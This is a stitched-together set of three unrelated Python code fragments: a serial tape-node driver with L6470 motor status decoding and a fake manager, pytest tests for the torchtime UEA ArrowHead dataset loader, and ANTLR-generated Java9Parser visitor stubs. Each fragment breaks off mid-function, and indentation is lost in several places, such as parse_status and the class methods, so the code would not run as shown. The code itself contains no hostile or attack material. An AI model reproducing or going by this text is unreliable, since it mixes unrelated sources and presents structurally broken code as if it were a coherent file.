FEED_REEL = 0b00
FEED_PINCH = 0b01
PICKUP_REEL = 0b10
PICKUP_PINCH = 0b11
drives = [FEED_REEL, FEED_PINCH, PICKUP_REEL, PICKUP_PINCH]
# Movement/tension mode codes passed to the firmware.
COLLECT = 0
DISPENSE = 1
TENSION = 2
UNTENSION = 3
# Option flag bits for the 'step_tape' command.
ST_OPTS_RUN_REELS = 0x01
ST_OPTS_WAIT = 0x02
ST_OPTS_WATCH = 0x04
def parse_motor_status(s):
    """Decode the MOT_STATUS bits (A=0x0040, B=0x0020) of an L6470 status word."""
    a = bool(s & 0x0040)  # A 0x0040
    b = bool(s & 0x0020)  # B 0x0020
    if b:
        return 'constant speed' if a else 'accelerating'
    # (sic) misspelling preserved — callers may compare against this string
    return 'deccelerating' if a else 'stopped'
status_bits = {
'HIZ': lambda s: bool(s & 0x0001),
'BUSY': lambda s: bool(~s & 0x0002),
'SW_F': lambda s: 'closed' if (s & 0x0004) else 'open',
'SW_EVN': lambda s: bool(s & 0x0008),
'DIR': lambda s: 'forward' if (s & 0x0010) else 'reverse',
'MOT_STATUS': parse_motor_status,
'NOTPERF_CMD': lambda s: bool(s & 0x0080),
'WRONG_CMD': lambda s: bool(s & 0x0100),
'UVLO': lambda s: bool(~s & 0x0200),
'TH_WRN': lambda s: bool(~s & 0x0400),
'TH_SD': lambda s: bool(~s & 0x0800),
'OCD': lambda s: bool(~s & 0x1000),
'STEP_LOSS_A': lambda s: bool(~s & 0x2000),
'STEP_LOSS_B': lambda s: bool(~s & 0x4000),
'SCK_MOD': lambda s: bool(s & 0x8000),
}
def parse_status(status):
"""
bit name active
15: SCK_MOD 1
14: STEP_LOSS_B 0
13: STEP_LOSS_A 0
12: OCD 0
11: TH_SD 0
10: TH_WRN 0
09: UVLO 0
08: WRONG_CMD 1
07: NOTPERF_CMD 1
06: MOT_STATUS_A X
05: MOT_STATUS_B X
04: DIR X
03: SW_EVN 1
02: SW_F X
01: BUSY 0
00: HIZ 1
MOT_STATUS:
AB
00 stopped
01 accelerating
10 decelerating
11 constant speed
DIR: 0 = reverse, 1 = forward
SW_F: 0 = open, 1 = closed
"""
if isinstance(status, ctypes.c_int16):
status = int(status.value)
s = {}
for n in status_bits:
t = status_bits[n]
s[n] = t(status)
return s
class TapeNodeException(Exception):
    """Raised for tape-node failures (firmware error events, use while disconnected)."""
    pass
class FakeManager(object):
    """In-memory stand-in for the pycomando EventManager (loc == 'fake').

    Mimics on/trigger/blocking_trigger just enough for TapeNode to run
    without hardware; tension always reads back as the configured target.

    Bug fix: the tension limits were stored as floats (target +/- range/2.),
    and ``ctypes.c_int`` raises TypeError when handed a float, so
    'get_tension_limits' crashed in fake mode.  Values are now coerced to
    int before constructing the ctypes result.
    """
    def __init__(self, commands, tension_target, tension_range):
        self.commands = commands
        self._tension = tension_target
        #self._tension = 8461749  # 8461765
        htr = tension_range / 2.
        # store ints: ctypes.c_int rejects floats
        self._tension_limits = [
            int(self._tension - htr), int(self._tension + htr)]
    def on(self, name, func):
        """No-op: the fake never emits events."""
        pass
    def trigger(self, name, *args):
        """Handle fire-and-forget commands (only set_tension_limits matters)."""
        # set_tension_limits
        if name == 'set_tension_limits':
            self._tension_limits = [args[0], args[1]]
        # set_position
        # step_tape
    def blocking_trigger(self, cmd, *args):
        """Return canned ctypes results for supported commands, else None."""
        return {
            'step_tape': [ctypes.c_int(self._tension), ],
            'get_tension_limits': [
                ctypes.c_int(int(v)) for v in self._tension_limits],
            'read_tension': [ctypes.c_int(self._tension), ],
            'get_status': [ctypes.c_int(0), ],
            'get_position': [ctypes.c_int(0), ],
            'get_speed': [ctypes.c_int(0), ],
        }.get(cmd, None)
class TapeNode(base.IONode):
def __init__(self, cfg=None):
    """Create the node; no hardware is touched until connect()."""
    base.IONode.__init__(self, cfg)
    cfg = self.config()  # merged config after base init; unused here
    #
    #logger.info("TapeNode[%s] proxying motion %s", self, cfg['motion'])
    self.cmd = None  # command protocol handle; None == disconnected
    self._state = None  # tape state, unknown until set or guessed
    self._barcodes = []
    self.new_state = pizco.Signal(nargs=1)  # emitted on state change
def __del__(self):
    """Delegate teardown to the base IONode destructor."""
    # disconnect signals
    base.IONode.__del__(self)
def __repr__(self):
    """Identify the node by module, class, object id, and configured address."""
    cfg = self.config()
    return "{}.{} at {} addr {}".format(
        self.__module__, self.__class__, hex(id(self)),
        cfg.get('addr', ''))
def check_config(self, cfg=None):
    """Validate that the required configuration keys are present.

    Args:
        cfg: config dict to check; defaults to this node's own config.

    Raises whatever `require` raises for a missing key.
    """
    if cfg is None:
        cfg = self.config()
    # plain loop — the original list comprehension was used only for
    # side effects and built a throwaway list
    for key in (
            'loc', 'baud', 'tension_target', 'tension_range',
            'tension_steps', 'steps_per_mm', 'mms_per_second',
            'tension_step_size',
    ):
        require(cfg, key)
    # TODO finish checking config
def config_delta(self, delta):
    """React to config changes: re-push tension limits when targets change."""
    logger.info("TapeNode[%s] config_delta %s", self, delta)
    if 'tension_target' in delta or 'tension_range' in delta:
        self._set_tension_limits()
def connect(self):
    """Open the serial link (or install the fake manager) and initialize.

    No-op when already connected.  For real hardware this opens the
    serial port, wires up the pycomando protocols, waits for the arduino
    reset, then registers the error handler and pushes tension limits.
    """
    if self.cmd is not None:
        return
    self.check_config()
    cfg = self.config()
    logger.info(
        "TapeNode[%s] creating serial %s, %s",
        self, cfg['loc'], cfg['baud'])
    # add options for fake tape node
    if cfg['loc'] == 'fake':
        # make fake cmd and fake mgr
        self.cmd = 'fake'
        self.mgr = FakeManager(
            commands, cfg['tension_target'], cfg['tension_range'])
        self._barcodes = cfg.get(
            'fakebarcodes', {}).get('initial', [])
        # save initial barcodes
        self._save_barcodes()
    else:
        self.serial = serial.Serial(cfg['loc'], cfg['baud'])
        self.comando = pycomando.Comando(self.serial)
        self.cmd = pycomando.protocols.CommandProtocol(self.comando)
        self.comando.register_protocol(1, self.cmd)
        self.mgr = pycomando.protocols.command.EventManager(
            self.cmd, commands)
        time.sleep(4)  # wait for the arduino to start
    self.mgr.on('error', self._error)
    self._set_tension_limits()
    #self.guess_state()
    logger.info("TapeNode[%s] connected to %s", self, cfg['loc'])
def disconnect(self):
    """Close the serial port (if any) and drop all protocol objects."""
    if self.cmd is None:
        return
    if hasattr(self, 'serial'):
        self.serial.close()
        del self.serial
    # attributes may be absent depending on fake vs real connect path
    for a in ('mgr', 'cmd', 'comando'):
        if hasattr(self, a):
            delattr(self, a)
    self.cmd = None
    logger.info("TapeNode[%s] disconnected", self)
def connected(self):
    """Return True when connect() has established a (real or fake) link."""
    # idiomatic: self.cmd is the connection sentinel, None == disconnected
    return self.cmd is not None
def _error(self, code):
    """Firmware 'error' event handler: log and escalate as an exception."""
    logger.info("TapeNode[%s] error[%s]", self, code)
    raise TapeNodeException(code)
@property
def state(self):
    # last known tape state; None until assigned or guessed
    return self._state
@state.setter
def state(self, new_state):
    # emit the new_state signal only on an actual change
    if new_state == self._state:
        return
    self._state = new_state
    self.new_state.emit(self._state)
def get_state(self):
    """Plain-method accessor for `state` (presumably for the pizco proxy — verify)."""
    return self.state
def set_state(self, new_state):
    """Plain-method setter for `state` (presumably for the pizco proxy — verify)."""
    self.state = new_state
def guess_state(self):
    """Infer tensioned/untensioned from a tension reading.

    Only guesses when the state is currently unknown (None); an already
    known state is returned unchanged.
    """
    if self.state is not None:
        return self.state
    tension = self.read_tension(10)
    threshold = self.config()['untensioned_threshold']
    self.state = 'untensioned' if tension < threshold else 'tensioned'
# -- low level --
def trigger(self, cmd, *args):
    """Fire-and-forget a firmware command (no result expected).

    Raises:
        TapeNodeException: if the node is not connected.
    """
    logger.debug("TapeNode[%s] trigger: %s, %s", self, cmd, args)
    if not self.connected():
        raise TapeNodeException(
            "Failed trigger %s, not connected" % cmd)
    self.mgr.trigger(cmd, *args)
def blocking_trigger(self, cmd, *args):
logger.debug("TapeNode[%s] blocking_trigger: %s, %s", self, cmd, args)
if not self.connected():
raise TapeNodeException(
| |
<reponame>philipdarke/torchtime
import re
import pytest
import torch
from torchtime.data import UEA
SEED = 456789
RTOL = 1e-4
ATOL = 1e-4
class TestUEAArrowHead:
def test_invalid_split_arg(self):
    """Catch invalid split argument."""
    with pytest.raises(
        AssertionError,
        match=re.escape("argument 'split' must be one of ['train', 'val']"),
    ):
        UEA(
            dataset="ArrowHead",
            split="xyz",
            train_prop=0.8,
            seed=SEED,
        )
def test_invalid_split_size(self):
    """Catch invalid split sizes."""
    with pytest.raises(
        AssertionError,
        match=re.escape("argument 'train_prop' must be in range (0, 1)"),
    ):
        UEA(
            dataset="ArrowHead",
            split="train",
            train_prop=-0.5,
            seed=SEED,
        )
def test_incompatible_split_size(self):
    """Catch incompatible split sizes."""
    # train_prop == 1 leaves no data for validation
    with pytest.raises(
        AssertionError,
        match=re.escape("argument 'train_prop' must be in range (0, 1)"),
    ):
        UEA(
            dataset="ArrowHead",
            split="train",
            train_prop=1,
            seed=SEED,
        )
    # train + val proportions must leave room for the test split
    with pytest.raises(
        AssertionError,
        match=re.escape("argument 'val_prop' must be in range (0, 1-train_prop)"),
    ):
        UEA(
            dataset="ArrowHead",
            split="test",
            train_prop=0.5,
            val_prop=0.5,
            seed=SEED,
        )
def test_train_val(self):
    """Test training/validation split sizes."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        seed=SEED,
    )
    # Check data set size
    assert dataset.X_train.shape == torch.Size([148, 251, 2])
    assert dataset.y_train.shape == torch.Size([148, 3])
    assert dataset.length_train.shape == torch.Size([148])
    assert dataset.X_val.shape == torch.Size([63, 251, 2])
    assert dataset.y_val.shape == torch.Size([63, 3])
    assert dataset.length_val.shape == torch.Size([63])
    # Ensure no test data is returned
    with pytest.raises(
        AttributeError, match=re.escape("'UEA' object has no attribute 'X_test'")
    ):
        dataset.X_test
    with pytest.raises(
        AttributeError, match=re.escape("'UEA' object has no attribute 'y_test'")
    ):
        dataset.y_test
    with pytest.raises(
        AttributeError,
        match=re.escape("'UEA' object has no attribute 'length_test'"),
    ):
        dataset.length_test
def test_train_val_test(self):
    """Test training/validation/test split sizes."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        seed=SEED,
    )
    # Check data set size
    assert dataset.X_train.shape == torch.Size([148, 251, 2])
    assert dataset.y_train.shape == torch.Size([148, 3])
    assert dataset.length_train.shape == torch.Size([148])
    assert dataset.X_val.shape == torch.Size([42, 251, 2])
    assert dataset.y_val.shape == torch.Size([42, 3])
    assert dataset.length_val.shape == torch.Size([42])
    assert dataset.X_test.shape == torch.Size([21, 251, 2])
    assert dataset.y_test.shape == torch.Size([21, 3])
    assert dataset.length_test.shape == torch.Size([21])
def test_train_split(self):
    """Test training split is returned."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        seed=SEED,
    )
    # Check correct split is returned
    assert torch.allclose(dataset.X, dataset.X_train)
    assert torch.allclose(dataset.y, dataset.y_train)
    assert torch.allclose(dataset.length, dataset.length_train)
def test_val_split(self):
    """Test validation split is returned."""
    dataset = UEA(
        dataset="ArrowHead",
        split="val",
        train_prop=0.7,
        val_prop=0.2,
        seed=SEED,
    )
    # Check correct split is returned
    assert torch.allclose(dataset.X, dataset.X_val)
    assert torch.allclose(dataset.y, dataset.y_val)
    assert torch.allclose(dataset.length, dataset.length_val)
def test_test_split(self):
    """Test test split is returned."""
    dataset = UEA(
        dataset="ArrowHead",
        split="test",
        train_prop=0.7,
        val_prop=0.2,
        seed=SEED,
    )
    # Check correct split is returned
    assert torch.allclose(dataset.X, dataset.X_test)
    assert torch.allclose(dataset.y, dataset.y_test)
    assert torch.allclose(dataset.length, dataset.length_test)
def test_length(self):
    """Test length attribute."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        time=False,
        seed=SEED,
    )
    # ArrowHead is a fixed-length data set, so every trajectory length
    # should equal the sequence dimension
    assert torch.all(dataset.length_train == dataset.length_train[0])
    assert dataset.X_train.size(1) == dataset.length_train[0]
    assert torch.all(dataset.length_val == dataset.length_val[0])
    assert dataset.X_val.size(1) == dataset.length_val[0]
    assert torch.all(dataset.length_test == dataset.length_test[0])
    assert dataset.X_test.size(1) == dataset.length_test[0]
def test_missing(self):
    """Test missing data simulation."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        missing=0.5,
        seed=SEED,
    )
    # Check number of NaNs
    assert (
        torch.sum(torch.isnan(dataset.X_train)).item() == 18500
    )  # expect around 148 * 251 * 0.5 = 18,574
    assert (
        torch.sum(torch.isnan(dataset.X_val)).item() == 5250
    )  # expect around 42 * 251 * 0.5 = 5,271
    assert (
        torch.sum(torch.isnan(dataset.X_test)).item() == 2625
    )  # expect around 21 * 251 * 0.5 = 2,635
def test_invalid_impute(self):
    """Catch invalid impute arguments."""
    with pytest.raises(
        AssertionError,
        match=re.escape(
            "argument 'impute' must be a string in dict_keys(['none', 'mean', 'forward']) or a function"  # noqa: E501
        ),
    ):
        UEA(
            dataset="ArrowHead",
            split="train",
            train_prop=0.7,
            missing=0.5,
            impute="blah",
            seed=SEED,
        )
    with pytest.raises(
        Exception,
        match=re.escape(
            "argument 'impute' must be a string in dict_keys(['none', 'mean', 'forward']) or a function"  # noqa: E501
        ),
    ):
        UEA(
            dataset="ArrowHead",
            split="train",
            train_prop=0.7,
            missing=0.5,
            impute=3,
            seed=SEED,
        )
def test_no_impute(self):
    """Test no imputation."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        missing=0.5,
        impute="none",
        seed=SEED,
    )
    # Check number of NaNs
    assert torch.sum(torch.isnan(dataset.X_train)).item() == 18500
    assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_val)).item() == 5250
    assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_test)).item() == 2625
    assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_mean_impute(self):
    """Test mean imputation."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        missing=0.5,
        impute="mean",
        seed=SEED,
    )
    # Check no NaNs post imputation
    assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
    assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
    assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
    assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_forward_impute(self):
    """Test forward imputation."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        missing=0.5,
        impute="forward",
        seed=SEED,
    )
    # Check no NaNs post imputation
    assert torch.sum(torch.isnan(dataset.X_train)).item() == 0
    assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_val)).item() == 0
    assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_test)).item() == 0
    assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_custom_impute(self):
    """Test custom imputation function."""
    def custom_imputer(X, y, fill):
        """Does not impute data i.e. same as impute='none'"""
        return X, y
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        missing=0.5,
        impute=custom_imputer,
        seed=SEED,
    )
    # Check number of NaNs
    assert torch.sum(torch.isnan(dataset.X_train)).item() == 18500
    assert torch.sum(torch.isnan(dataset.y_train)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_val)).item() == 5250
    assert torch.sum(torch.isnan(dataset.y_val)).item() == 0
    assert torch.sum(torch.isnan(dataset.X_test)).item() == 2625
    assert torch.sum(torch.isnan(dataset.y_test)).item() == 0
def test_time(self):
    """Test time argument."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        time=True,
        seed=SEED,
    )
    # Check data set size
    assert dataset.X_train.shape == torch.Size([148, 251, 2])
    assert dataset.X_val.shape == torch.Size([42, 251, 2])
    assert dataset.X_test.shape == torch.Size([21, 251, 2])
    # Check time channel (channel 0 holds the time index)
    for i in range(251):
        assert torch.equal(
            dataset.X_train[:, i, 0],
            torch.full([148], fill_value=i, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_val[:, i, 0],
            torch.full([42], fill_value=i, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_test[:, i, 0],
            torch.full([21], fill_value=i, dtype=torch.float),
        )
def test_no_time(self):
    """Test time argument."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        time=False,
        seed=SEED,
    )
    # Check data set size (no time channel -> one channel only)
    assert dataset.X_train.shape == torch.Size([148, 251, 1])
    assert dataset.X_val.shape == torch.Size([42, 251, 1])
    assert dataset.X_test.shape == torch.Size([21, 251, 1])
def test_mask(self):
    """Test mask argument."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        time=False,
        mask=True,
        seed=SEED,
    )
    # Check data set size
    assert dataset.X_train.shape == torch.Size([148, 251, 2])
    assert dataset.X_val.shape == torch.Size([42, 251, 2])
    assert dataset.X_test.shape == torch.Size([21, 251, 2])
    # Check mask channel (no missing data -> all ones)
    assert torch.sum(dataset.X_train[:, :, 1]) == 148 * 251
    assert torch.sum(dataset.X_val[:, :, 1]) == 42 * 251
    assert torch.sum(dataset.X_test[:, :, 1]) == 21 * 251
def test_delta(self):
    """Test time delta argument."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        time=False,
        delta=True,
        seed=SEED,
    )
    # Check data set size
    assert dataset.X_train.shape == torch.Size([148, 251, 2])
    assert dataset.X_val.shape == torch.Size([42, 251, 2])
    assert dataset.X_test.shape == torch.Size([21, 251, 2])
    # Check time delta channel: zero at t=0, one thereafter
    assert torch.equal(
        dataset.X_train[:, 0, 1], torch.zeros([148], dtype=torch.float)
    )
    assert torch.equal(dataset.X_val[:, 0, 1], torch.zeros([42], dtype=torch.float))
    assert torch.equal(
        dataset.X_test[:, 0, 1], torch.zeros([21], dtype=torch.float)
    )
    for i in range(1, 251):
        assert torch.equal(
            dataset.X_train[:, i, 1],
            torch.full([148], fill_value=1, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_val[:, i, 1],
            torch.full([42], fill_value=1, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_test[:, i, 1],
            torch.full([21], fill_value=1, dtype=torch.float),
        )
def test_time_mask_delta(self):
    """Test combination of time/mask/delta arguments."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        mask=True,
        delta=True,
        seed=SEED,
    )
    # Check data set size (data + time + mask + delta = 4 channels)
    assert dataset.X_train.shape == torch.Size([148, 251, 4])
    assert dataset.X_val.shape == torch.Size([42, 251, 4])
    assert dataset.X_test.shape == torch.Size([21, 251, 4])
    # Check time channel
    for i in range(251):
        assert torch.equal(
            dataset.X_train[:, i, 0],
            torch.full([148], fill_value=i, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_val[:, i, 0],
            torch.full([42], fill_value=i, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_test[:, i, 0],
            torch.full([21], fill_value=i, dtype=torch.float),
        )
    # Check mask channel
    assert torch.sum(dataset.X_train[:, :, 2]) == 148 * 251
    assert torch.sum(dataset.X_val[:, :, 2]) == 42 * 251
    assert torch.sum(dataset.X_test[:, :, 2]) == 21 * 251
    # Check time delta channel
    assert torch.equal(
        dataset.X_train[:, 0, 3], torch.zeros([148], dtype=torch.float)
    )
    assert torch.equal(dataset.X_val[:, 0, 3], torch.zeros([42], dtype=torch.float))
    assert torch.equal(
        dataset.X_test[:, 0, 3], torch.zeros([21], dtype=torch.float)
    )
    for i in range(1, 251):
        assert torch.equal(
            dataset.X_train[:, i, 3],
            torch.full([148], fill_value=1, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_val[:, i, 3],
            torch.full([42], fill_value=1, dtype=torch.float),
        )
        assert torch.equal(
            dataset.X_test[:, i, 3],
            torch.full([21], fill_value=1, dtype=torch.float),
        )
def test_downscale(self):
    """Test downscale argument."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        downscale=0.1,
        seed=SEED,
    )
    # Check data set size (10% of the full 148/42/21 splits)
    assert dataset.X_train.shape == torch.Size([15, 251, 2])
    assert dataset.y_train.shape == torch.Size([15, 3])
    assert dataset.length_train.shape == torch.Size([15])
    assert dataset.X_val.shape == torch.Size([4, 251, 2])
    assert dataset.y_val.shape == torch.Size([4, 3])
    assert dataset.length_val.shape == torch.Size([4])
    assert dataset.X_test.shape == torch.Size([2, 251, 2])
    assert dataset.y_test.shape == torch.Size([2, 3])
    assert dataset.length_test.shape == torch.Size([2])
def test_reproducibility_1(self):
    """Test seed argument."""
    dataset = UEA(
        dataset="ArrowHead",
        split="train",
        train_prop=0.7,
        val_prop=0.2,
        seed=SEED,
    )
    # Check first value in each data set
    assert torch.allclose(
        dataset.X_train[0, 0, 1], torch.tensor(-1.8515), rtol=RTOL, atol=ATOL
    )
    assert torch.allclose(
        dataset.X_val[0, 0, 1], torch.tensor(-1.9190), rtol=RTOL, atol=ATOL
    )
    assert torch.allclose(
        dataset.X_test[0, 0, 1], torch.tensor(-1.8091), rtol=RTOL, atol=ATOL
    )
def test_reproducibility_2(self):
| |
tree produced by Java9Parser#simpleTypeName.
# NOTE: ANTLR-generated visitor stubs — each default implementation just
# visits the rule's children.  Override individual methods as needed.
def visitSimpleTypeName(self, ctx:Java9Parser.SimpleTypeNameContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#constructorBody.
def visitConstructorBody(self, ctx:Java9Parser.ConstructorBodyContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#explicitConstructorInvocation.
def visitExplicitConstructorInvocation(self, ctx:Java9Parser.ExplicitConstructorInvocationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumDeclaration.
def visitEnumDeclaration(self, ctx:Java9Parser.EnumDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumBody.
def visitEnumBody(self, ctx:Java9Parser.EnumBodyContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstantList.
def visitEnumConstantList(self, ctx:Java9Parser.EnumConstantListContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstant.
def visitEnumConstant(self, ctx:Java9Parser.EnumConstantContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstantModifier.
def visitEnumConstantModifier(self, ctx:Java9Parser.EnumConstantModifierContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumBodyDeclarations.
def visitEnumBodyDeclarations(self, ctx:Java9Parser.EnumBodyDeclarationsContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceDeclaration.
def visitInterfaceDeclaration(self, ctx:Java9Parser.InterfaceDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#normalInterfaceDeclaration.
def visitNormalInterfaceDeclaration(self, ctx:Java9Parser.NormalInterfaceDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceModifier.
def visitInterfaceModifier(self, ctx:Java9Parser.InterfaceModifierContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#extendsInterfaces.
def visitExtendsInterfaces(self, ctx:Java9Parser.ExtendsInterfacesContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceBody.
def visitInterfaceBody(self, ctx:Java9Parser.InterfaceBodyContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceMemberDeclaration.
def visitInterfaceMemberDeclaration(self, ctx:Java9Parser.InterfaceMemberDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#constantDeclaration.
def visitConstantDeclaration(self, ctx:Java9Parser.ConstantDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#constantModifier.
def visitConstantModifier(self, ctx:Java9Parser.ConstantModifierContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceMethodDeclaration.
def visitInterfaceMethodDeclaration(self, ctx:Java9Parser.InterfaceMethodDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#interfaceMethodModifier.
def visitInterfaceMethodModifier(self, ctx:Java9Parser.InterfaceMethodModifierContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeDeclaration.
def visitAnnotationTypeDeclaration(self, ctx:Java9Parser.AnnotationTypeDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeBody.
def visitAnnotationTypeBody(self, ctx:Java9Parser.AnnotationTypeBodyContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeMemberDeclaration.
def visitAnnotationTypeMemberDeclaration(self, ctx:Java9Parser.AnnotationTypeMemberDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeElementDeclaration.
def visitAnnotationTypeElementDeclaration(self, ctx:Java9Parser.AnnotationTypeElementDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotationTypeElementModifier.
def visitAnnotationTypeElementModifier(self, ctx:Java9Parser.AnnotationTypeElementModifierContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#defaultValue.
def visitDefaultValue(self, ctx:Java9Parser.DefaultValueContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#annotation.
def visitAnnotation(self, ctx:Java9Parser.AnnotationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#normalAnnotation.
def visitNormalAnnotation(self, ctx:Java9Parser.NormalAnnotationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValuePairList.
def visitElementValuePairList(self, ctx:Java9Parser.ElementValuePairListContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValuePair.
def visitElementValuePair(self, ctx:Java9Parser.ElementValuePairContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValue.
def visitElementValue(self, ctx:Java9Parser.ElementValueContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValueArrayInitializer.
def visitElementValueArrayInitializer(self, ctx:Java9Parser.ElementValueArrayInitializerContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#elementValueList.
def visitElementValueList(self, ctx:Java9Parser.ElementValueListContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#markerAnnotation.
def visitMarkerAnnotation(self, ctx:Java9Parser.MarkerAnnotationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#singleElementAnnotation.
def visitSingleElementAnnotation(self, ctx:Java9Parser.SingleElementAnnotationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#arrayInitializer.
def visitArrayInitializer(self, ctx:Java9Parser.ArrayInitializerContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#variableInitializerList.
def visitVariableInitializerList(self, ctx:Java9Parser.VariableInitializerListContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#block.
def visitBlock(self, ctx:Java9Parser.BlockContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#blockStatements.
def visitBlockStatements(self, ctx:Java9Parser.BlockStatementsContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#blockStatement.
def visitBlockStatement(self, ctx:Java9Parser.BlockStatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#localVariableDeclarationStatement.
def visitLocalVariableDeclarationStatement(self, ctx:Java9Parser.LocalVariableDeclarationStatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#localVariableDeclaration.
def visitLocalVariableDeclaration(self, ctx:Java9Parser.LocalVariableDeclarationContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statement.
def visitStatement(self, ctx:Java9Parser.StatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementNoShortIf.
def visitStatementNoShortIf(self, ctx:Java9Parser.StatementNoShortIfContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementWithoutTrailingSubstatement.
def visitStatementWithoutTrailingSubstatement(self, ctx:Java9Parser.StatementWithoutTrailingSubstatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#emptyStatement.
def visitEmptyStatement(self, ctx:Java9Parser.EmptyStatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#labeledStatement.
def visitLabeledStatement(self, ctx:Java9Parser.LabeledStatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#labeledStatementNoShortIf.
def visitLabeledStatementNoShortIf(self, ctx:Java9Parser.LabeledStatementNoShortIfContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#expressionStatement.
def visitExpressionStatement(self, ctx:Java9Parser.ExpressionStatementContext):
